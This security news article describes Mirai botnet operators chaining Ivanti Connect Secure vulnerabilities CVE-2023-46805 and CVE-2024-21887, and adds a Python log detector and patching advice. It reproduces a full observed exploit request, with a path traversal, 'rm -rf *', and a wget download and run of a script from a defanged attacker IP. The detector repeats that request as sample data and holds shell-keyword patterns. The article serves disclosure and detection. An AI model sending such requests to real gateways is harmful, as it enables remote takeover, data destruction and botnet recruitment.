Mirai Botnet Exploits Ivanti Vulnerabilities (CVE-2023-46805 & CVE-2024-21887)

Mirai botnet malware

Security researchers at Juniper Threat Labs have uncovered a dangerous escalation in attacks targeting Ivanti Connect Secure (ICS) and Ivanti Policy Secure Gateways. Attackers are weaponizing two critical vulnerabilities, CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (remote code execution), to spread the notorious Mirai botnet malware. This potent combination opens the door for widespread network compromise and disruption.

Both vulnerabilities affect Ivanti Connect Secure and Ivanti Policy Secure gateways. CVE-2023-46805 is an authentication bypass: the web component does not adequately check requests to the “/api/v1/totp/user-backup-code/” endpoint, so an unauthenticated attacker can append a path-traversal sequence (“../../”) to it and reach other API endpoints that should require a session. CVE-2024-21887 is a command injection: part of the path supplied to the “/api/v1/license/keys-status/” endpoint is passed to a shell, so anyone who can reach that endpoint can run arbitrary commands on the appliance. Chained together, the first flaw reaches the second without credentials, which is what turns the pair into an unauthenticated remote code execution.

Exploitation of these vulnerabilities has facilitated the delivery of the Mirai botnet, marking a significant escalation in the severity of potential attacks. Attackers have utilized crafted requests to execute malicious scripts through vulnerable endpoints, effectively turning affected systems into botnet nodes. These nodes can then be used for further malicious activities, such as distributed denial-of-service (DDoS) attacks.

One request observed by Juniper Threat Labs looked like this (the IP address is defanged):

GET /api/v1/totp/user-backup-code/../../license/keys-status/rm -rf *; cd /tmp; wget http://192[.]3[.]152[.]183/wtf.sh; chmod 777 wtf.sh; ./wtf.sh HTTP/1.1

The traversal in the request path routes the unauthenticated call to the keys-status handler, and everything after “keys-status/” is executed as a shell command string: delete all files in the current working directory, change to /tmp, download a script named wtf.sh from the attacker's server, make it executable, and run it. The script then cycles through a list of system directories, downloading and executing additional payloads (the Mirai bot binaries) from each, further entrenching the botnet on the compromised appliance.
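The request pattern above is easy to hunt for in access logs once the two ingredients are separated: a “../” traversal out of the unauthenticated TOTP endpoint, and shell metacharacters in the segment handed to the keys-status handler. The following detector is an added example written for this article, not code from Juniper Threat Labs or Ivanti; the endpoint paths and the observed attack line come from the page, the other sample lines are constructed, and it assumes your logs contain raw HTTP request lines (possibly percent-encoded), which is an assumption rather than a documented Ivanti log format.

```python
"""Flag CVE-2023-46805 / CVE-2024-21887 exploitation attempts in HTTP request lines.

Added example for this article; not code from Juniper Threat Labs or Ivanti.
Endpoint paths and the first sample line come from the article; the remaining
sample lines are constructed for illustration.
"""
import re
from posixpath import normpath
from urllib.parse import unquote

# Unauthenticated endpoint used as the traversal entry point (CVE-2023-46805).
TOTP_PREFIX = "/api/v1/totp/user-backup-code/"
# Endpoint whose trailing path segment reaches a shell (CVE-2024-21887).
LICENSE_PREFIX = "/api/v1/license/keys-status"

REQUEST_LINE = re.compile(r"^([A-Z]+)\s+(.+?)\s+HTTP/\d(?:\.\d)?$")
DOT_DOT = re.compile(r"(^|/)\.\.(/|$)")
# Shell metacharacters and tool names that have no place in a license-key lookup.
SHELL_META = re.compile(r"[;|&`]|\$\(|\b(?:wget|curl|chmod|rm|sh|bash)\b")
URL_RE = re.compile(r"https?://[^\s;|&\"']+")


def split_request_line(line):
    """Return (method, target); tolerates raw spaces in the target, as in the observed attack."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return None, None
    return m.group(1), m.group(2)


def fully_decode(target, rounds=3):
    """Percent-decode repeatedly so double encoding (%252e%252e) cannot hide '..'."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def analyze_request(line):
    """Classify one request line; the dict is what you would forward to a SIEM."""
    method, target = split_request_line(line)
    if target is None:
        return {"verdict": "unparsed", "method": None, "traversal": False,
                "injection": False, "payload": "", "urls": []}
    decoded = fully_decode(target)
    # Traversal out of the unauthenticated TOTP endpoint: the CVE-2023-46805 pattern.
    traversal = decoded.startswith(TOTP_PREFIX) and bool(DOT_DOT.search(decoded))
    # Resolve '..' the way the backend router would, to see which handler really runs.
    effective = normpath(decoded)
    payload, injection = "", False
    if effective == LICENSE_PREFIX or effective.startswith(LICENSE_PREFIX + "/"):
        payload = effective[len(LICENSE_PREFIX):].lstrip("/")
        injection = bool(SHELL_META.search(payload))
    urls = URL_RE.findall(decoded)  # second-stage download locations, if any
    if traversal and injection:
        verdict = "exploit chain: CVE-2023-46805 + CVE-2024-21887"
    elif injection:
        verdict = "command injection: CVE-2024-21887"
    elif traversal:
        verdict = "auth bypass traversal: CVE-2023-46805"
    else:
        verdict = "benign"
    return {"verdict": verdict, "method": method, "traversal": traversal,
            "injection": injection, "payload": payload, "urls": urls}


def scan_log(lines):
    """Return (result, line) pairs for every non-benign request line."""
    hits = []
    for line in lines:
        result = analyze_request(line)
        if result["verdict"] != "benign":
            hits.append((result, line))
    return hits


# Constructed sample log: line 0 is the attack request reported in the article,
# the rest are made up here (one percent-encoded variant, two benign calls).
SAMPLE_LINES = [
    "GET /api/v1/totp/user-backup-code/../../license/keys-status/rm -rf *; cd /tmp; "
    "wget http://192[.]3[.]152[.]183/wtf.sh; chmod 777 wtf.sh; ./wtf.sh HTTP/1.1",
    "GET /api/v1/totp/user-backup-code/..%2F..%2Flicense/keys-status/%3Bid%3B HTTP/1.1",
    "GET /api/v1/license/keys-status/ HTTP/1.1",
    "POST /api/v1/totp/user-backup-code/ HTTP/1.1",
]

if __name__ == "__main__":
    for result, line in scan_log(SAMPLE_LINES):
        print(result["verdict"], "|", line[:80])
```

Resolving the traversal with normpath before looking at the keys-status segment is the important design choice: matching on the literal string “user-backup-code/../../” alone misses encoded variants, while matching only on the keys-status prefix would flag an authenticated, non-traversal call as the full unauthenticated chain.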

Image: Juniper Threat Labs

The best defense is a multi-pronged approach:

  • Immediate Patching: Organizations running Ivanti Connect Secure or Ivanti Policy Secure must prioritize installing the security updates released by Ivanti; where a patch for a given version is not yet available, apply the vendor's interim mitigation and treat the appliance as exposed until it is patched. Patching does not remove a bot that is already installed, so any gateway that was reachable while unpatched should be checked for compromise rather than assumed clean.
  • Network Monitoring: Implement robust monitoring to detect suspicious activity. Review the gateway's web access logs for requests to /api/v1/totp/user-backup-code/ that contain “../” or reach /api/v1/license/keys-status/ with shell metacharacters, and watch for outbound connections from the appliance to unfamiliar hosts: a VPN gateway fetching a shell script over plain HTTP, or generating the traffic patterns of a DDoS node, is not normal behaviour.
  • Security Best Practices: Enforce strong password policies across all network-connected devices and educate employees about phishing and the importance of software updates. Note that these controls do not mitigate this particular attack, which bypasses authentication entirely; only patching or the vendor mitigation does.